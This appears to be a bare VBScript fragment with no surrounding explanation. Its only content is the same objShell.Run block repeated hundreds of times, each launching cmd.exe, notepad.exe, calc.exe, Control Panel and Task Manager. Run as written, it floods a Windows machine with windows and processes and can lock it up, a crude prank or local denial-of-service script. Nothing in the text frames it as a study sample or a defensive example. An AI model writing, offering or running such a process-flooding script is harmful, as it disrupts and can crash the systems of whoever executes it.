objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
